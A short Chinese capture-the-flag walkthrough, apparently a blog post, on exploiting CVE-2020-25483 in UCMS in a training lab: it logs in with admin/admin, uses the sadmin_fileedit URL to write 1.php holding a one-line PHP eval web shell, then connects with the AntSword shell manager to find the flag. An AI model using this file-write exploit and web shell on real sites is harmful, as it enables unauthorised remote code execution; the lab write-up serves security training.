春秋云境CVE-2020-25483

1.阅读靶场介绍

这里得到就是文件写入

然后再读取文件

2.启动靶场

如下图所示

这里我们可以直接再url后面加上

/ucms/login.php

进入下面所示的页面

这里输入账号/密码:admin/admin

下一步就是输入如下图的url

各位可以参考参考

https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/ucms/index.php?do=sadmin_fileedit&dir=/&file=1.phpw

然后在下面输入这个木马

<?php @eval($_POST['cmd']);?>

然后访问

这个url:https://eci-2zeac6a5z2rxlqan7m7a.cloudeci1.ichunqiu.com:80/1.php

得到的是一片空白那就是对的

3.中国蚁剑启动

输入这些参数

然后就可以找到flag了

感谢各位的观看哟

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值